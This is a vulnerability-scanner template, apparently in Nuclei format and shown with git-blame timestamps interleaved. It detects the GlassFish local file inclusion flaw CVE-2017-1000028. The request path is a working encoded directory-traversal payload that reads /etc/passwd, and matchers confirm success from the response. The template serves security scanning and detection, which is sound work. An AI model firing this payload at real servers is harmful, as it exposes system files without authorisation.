2021-02-25 09:07:22 +00:00
|
|
|
id: CVE-2017-1000028
|
|
|
|
|
2021-02-16 08:38:42 +00:00
|
|
|
info:
|
2021-02-25 09:07:22 +00:00
|
|
|
name: GlassFish LFI
|
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
|
|
|
reference: https://www.exploit-db.com/exploits/45196
|
|
|
|
tags: cve,cve2017,oracle,glassfish,lfi
|
|
|
|
|
2021-02-16 08:38:42 +00:00
|
|
|
requests:
|
2021-02-25 09:07:22 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "/sbin/nologin"
|
|
|
|
part: body
|
|
|
|
|
2021-02-16 08:38:42 +00:00
|
|
|
- type: status
|
2021-02-25 09:07:22 +00:00
|
|
|
status:
|
|
|
|
- 200
|